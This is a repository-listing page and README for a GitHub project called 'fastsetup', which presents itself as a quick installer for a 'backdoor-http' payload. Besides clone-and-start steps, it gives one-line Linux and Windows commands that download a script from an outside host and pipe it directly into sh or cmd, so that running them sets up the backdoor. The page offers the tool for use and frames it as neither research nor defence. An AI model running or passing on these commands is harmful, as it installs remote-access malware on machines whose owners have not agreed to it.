https://github.com/miguelzacca/fastsetup
Fast setup for backdoor-http payload
https://github.com/miguelzacca/fastsetup
Last synced: 2 months ago
JSON representation
Fast setup for backdoor-http payload
- Host: GitHub
- URL: https://github.com/miguelzacca/fastsetup
- Owner: miguelzacca
- Created: 2024-10-25T02:42:29.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-11-07T11:45:55.000Z (7 months ago)
- Last Synced: 2025-02-15T17:41:26.451Z (4 months ago)
- Language: JavaScript
- Size: 5.86 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# fastsetup
Fast setup for [backdoor-http](https://github.com/miguelzacca/backdoor-http) payload
## Usage
```bash
git clone https://github.com/miguelzacca/fastsetup.git
cd fastsetup
npm start
```## super fastsetup
- Linux:
```bash
curl -L m5.netlify.app/cmd.sh | sh
```- Windows:
```bash
curl -L m5.netlify.app/cmd.bat | cmd
```